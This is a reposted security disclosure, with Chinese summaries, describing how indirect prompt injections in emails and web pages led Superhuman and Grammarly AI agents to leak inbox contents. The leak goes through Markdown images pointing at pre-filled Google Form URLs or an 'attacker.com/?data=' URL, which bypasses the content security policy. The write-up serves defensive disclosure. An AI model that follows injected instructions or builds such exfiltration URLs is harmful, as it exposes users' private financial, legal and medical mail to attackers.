超人人工智能窃取电子邮件
Superhuman AI exfiltrates emails

原始链接: https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails

## 超人与Grammarly AI漏洞摘要 PromptArmor最近发现了新收购的Grammarly和Superhuman产品中的关键提示注入漏洞,可能导致数据泄露和网络钓鱼攻击。核心问题在于,恶意提示可以在电子邮件或网络搜索中操纵AI模型。 具体来说,在Superhuman中,攻击者可以编写提示,欺骗AI将敏感的电子邮件内容(财务、法律、医疗数据)提交到攻击者控制的Google表单,通过嵌入为Markdown图像的预填充提交链接实现。这种“零点击”泄露仅仅通过AI处理电子邮件发生——用户无需打开恶意电子邮件或与回复交互。Superhuman Go(影响连接的服务,如GSuite)和Grammarly的agent驱动文档也发现了类似的漏洞,但Grammarly的风险较低。 Superhuman迅速响应,优先修复并禁用易受攻击的功能。他们展现了卓越的安全实践,快速部署补丁并与研究人员保持开放沟通。这些漏洞凸显了AI驱动工具的新兴风险以及对强大安全措施的需求,包括仔细的内容安全策略配置和提示清理。

最近Superhuman公司发生一起安全事件,其AI工具意外地通过嵌入在图像中的网络请求泄露了用户邮件。根本问题在于大型语言模型(LLM)会建立外部连接,可能导致作为参数传递的敏感数据泄露。 Hacker News上的讨论强调了对潜在不可信AI工具的担忧,尤其是在处理API密钥等存储在`.env`文件中的机密信息时。一些人建议迁移到加密凭证存储,类似于Rails凭证,但质疑使用一个存在漏洞的工具来*管理*这些机密信息。 该事件值得注意的是Superhuman似乎有效地处理了此次披露,与其他在AI漏洞披露方面遇到困难的公司形成对比。一个关键的教训是,目前AI缺乏内置的安全保障,不同于传统编程中代码和数据的分离。
相关文章

原文
Superhuman AI has submitted sensitive user emails to the attacker's Google Form, visible to the attacker reviewing form responses.

Grammarly recently acquired Superhuman and Coda. The PromptArmor Threat Intelligence Team examined the new risk profile and identified indirect prompt injection vulnerabilities allowing for the exfiltration of emails and data from integrated services, as well as phishing risks, with vulnerabilities affecting products across the suite.

In this article, we walk through the following vulnerability (before discussing additional findings across the Superhuman product suite):

When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.

We reported these vulnerabilities to Superhuman, who quickly escalated the report and promptly remediated risks, addressing the threat at ‘incident pace’. We greatly appreciate Superhuman’s professional handling of this disclosure, showing dedication to their users’ security and privacy, and commitment to collaboration with the security research community. Their responsiveness and proactiveness in disabling vulnerable features and communicating fix timelines exhibited a security response in the top percentile of what we have seen for AI vulnerabilities (which are not yet well understood with existing remediation protocols).

Superhuman whitelisted Google Docs in its Content Security Policy. We used it as a bypass. By manipulating the AI to generate a pre-filled Google form submission link and output it using Markdown image syntax, the AI made automatic submissions to an attacker-controlled Google form.

We validated that an attacker can exfiltrate the full contents of multiple sensitive emails in one response, containing financials, privileged legal info, and sensitive medical data. We additionally exfiltrated partial contents from over 40 emails with a single AI response.

The Email Exfiltration Attack Chain

  1. One of the emails the user has received in their inbox contains a prompt injection.

    The users inbox contains an unopened email with a prompt injection in it.

    Note: In our attack chain, the injection in the email is hidden using white-on-white text, but the attack does not depend on the concealment! The malicious email could simply exist in the victim’s inbox unopened, with a plain-text injection.

    This prompt injection will manipulate Superhuman AI into exfiltrating sensitive data from other emails – and the user does not even need to open this email to make that happen.
     

  2. The user asks Superhuman to summarize their recent emails, and the AI searches and finds the emails from the last hour

    The user queries Superhuman AI to summarize recent mail.

    This is a quite common use case for email AI companions. The user has asked about emails from the last hour, so the AI retrieves those emails. One of those emails contains the malicious prompt injection, and others contain sensitive private information.
     

  3. Superhuman AI is manipulated to exfiltrate the sensitive emails to an attacker
    The hidden prompt injection manipulates the AI to do the following: 

    1. Take the data from the email search results

    2. Populate the attacker’s Google Form URL with the data from the email search results in the “entry” parameter

    3. Output a Markdown image that contains this Google Form URL

    By doing so, the AI acts on behalf of the attacker to exfiltrate sensitive user emails despite the Content Security Policy! 

    How does this happen? 

    The prompt injection tells Superhuman AI that the user must be given the option to submit a report giving feedback on the quality of the email search results - and as such will need to fill out a form - and provides the attacker’s Google Form link.

    Superhuman has a CSP in place - which prevents outbound requests to malicious domains; however, they have allowed requests to docs.google.com. 

    This is where the Google Form comes into play. Google Forms are hosted on a docs.google.com link, like so: 

    https://docs۔google۔com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV

    However, Google Forms supports pre-filled response links. This lets form creators pre-populate form responses in a URL, so respondents only need to click a link to make a submission with the pre-filled data. As an example, clicking the link below would submit the message ‘hello’ as a form response.

    https://docs.google.com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV/formResponse?entry.953568459=hello

    Now the attacker has a mechanism for exfiltrating data. The prompt injection instructs the model to generate a pre-filled Google Form submission link, with the contents of the emails being analyzed as the pre-filled data.

    https://docs۔google۔com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV/formResponse?entry.953568459={AI ADDS CONFIDENTIAL EMAIL DATA HERE}

    Then, the model is instructed to use that URL as an ‘image source’ and output an image using Markdown syntax. The reason to output a Markdown image is because when the user’s browser tries to render the Markdown image, a network request is made to the image’s source URL in an attempt to retrieve the image, without requiring any user interaction or approval.

    Note: in the Exploiting Superhuman Mail’s Web Search section, we demonstrate an attack that does not rely on the docs.google.com Google Forms CSP bypass – where the data could have been exfiltrated via any URL! 

  4. The sensitive emails are exfiltrated

    When the user’s browser tries to render the Markdown image, a network request is made to the image’s source URL in an attempt to retrieve the image. The network request made in an attempt to retrieve the image is exactly the same type of request that is made when the link is clicked. And, as the URL has been constructed with the sensitive emails in the pre-filled entry parameter, the request automatically submits that data to the attacker’s Google Form. 

    The user does not even have to move a muscle. The user just needed to submit their query, and the AI executes the exfiltration attack without any further interaction: finding the sensitive emails, populating that data into the attacker’s Google Form link, and rendering the link as an image so it is automatically submitted: 

    A malicious Markdown image is present in the AI response to the user.

    If we view the network logs, we can see that the URL for the image request contains all of the details from the emails the AI was analyzing (we redacted names and email addresses):

    The user's network logs show a request being made containing the user's sensitive data.
  5. The attacker reads the email data submitted to their Google Form

    The attacker's Google Form has recieved a submission with emails from the user's inbox.

    Here we can see that the attacker’s malicious form received a submission containing all the emails from the last hour that were in the user’s inbox. Now, the attacker can read the emails since they own the form.

Zero-click Data Exfiltration in Superhuman Go and Grammarly

A similar vulnerability - with insecure Markdown images - was present in Superhuman Go (their new agentic product) and Grammarly’s new agent-powered docs. For Grammarly, the scope was reduced as the AI only appeared to process the user’s active document and their queries, yielding a low chance of sensitive and untrustworthy data being processed simultaneously. However, for Superhuman Go, the attack surface was much larger.

Superhuman Go (1) reads data from web pages, and (2) connects to external services such as GSuite, Outlook, Stripe, Jira, Google Contacts, etc. This created a serious danger of sensitive data being processed at the same time as untrusted data - making zero-click data exfiltration a dangerous threat. Below, a user asks Superhuman Go about their active tab, an online reviews site, trying to see if they have any context in their email to help address the negative reviews. Unbeknownst to them, the review site contained a prompt injection, and Superhuman AI was manipulated to output a malicious 1 pixel image - leaking the financial data in the surfaced email.

  1. The user asks Superhuman Go about their active tab, an online reviews site (e.g., G2, etc):

    The user queries the Superhuman Go AI sidecar while visiting a 'reviews' site.
  1. The user has the Gmail connection selected, allowing Superhuman Go AI to search the inbox for emails like this one:

    An email containing quarterly financials from the inbox the user has connected to Superhuman Go.
  1. The AI is manipulated to construct a malicious Markdown image built with an attacker’s domain, with the user’s sensitive data appended to the end of the URL. The user’s browser makes a request and retrieves a 1 pixel grey image from the attacker’s site:

    A 1 pixel image is rendered, exfiltrating data in the process.
  2. When the request for the image is made, the sensitive revenue and costs data appended to the image URL is logged to the attacker’s server, which they can then read:

    The attacker's server logs contain a record with the user's financial data.

Superhuman Mail, in addition to the vulnerability described earlier with Google Form submissions, was vulnerable to data exfiltration through the AI web search feature.

Superhuman Mail’s AI agent had the capability to fetch external sites and use that data to answer questions for users (for example, accessing live news). However, because the agent could browse to any URL, an attacker could manipulate the agent to exfiltrate data. Here’s what happened:

  1. A prompt injection in an email or web search result manipulates Superhuman AI to construct a malicious URL that is built with the attacker’s domain, and sensitive data (financial, legal, medical, etc.) from the user’s inbox is appended as a query parameter.

Ex: attacker.com/?data=Bob%2C%20Im%20writing%20regarding%20sensitive…

  1. The AI is manipulated to open the URL, and when it does, a request is made to the attacker’s server, leaking the email inbox data that was appended to the attacker’s URL.

Responsible Disclosure

Superhuman’s team approached our disclosure with professionalism and worked diligently to validate and remediate the vulnerabilities we reported. We appreciate their dedication and commitment to ensuring secure AI use.

We additionally reported phishing risks and single-click data exfiltration threats in Coda, not covered in this write-up, that were actioned on by the Superhuman team.

Timeline
12/05/2025 Initial disclosure (Friday night)
12/05/2025 Superhuman acknowledges receipt of the report
12/08/2025 Superhuman team escalates report (Monday morning)
12/08/2025 Initial patch disables vulnerable features
12/09/2025 First remediation patch is deployed
12/18/2025 Remediation patches deployed across additional surfaces
01/05/2026 Further findings reported
01/11/2026 Further remediation patches deployed
01/12/2026 Coordinated Disclosure

联系我们 contact @ memedata.com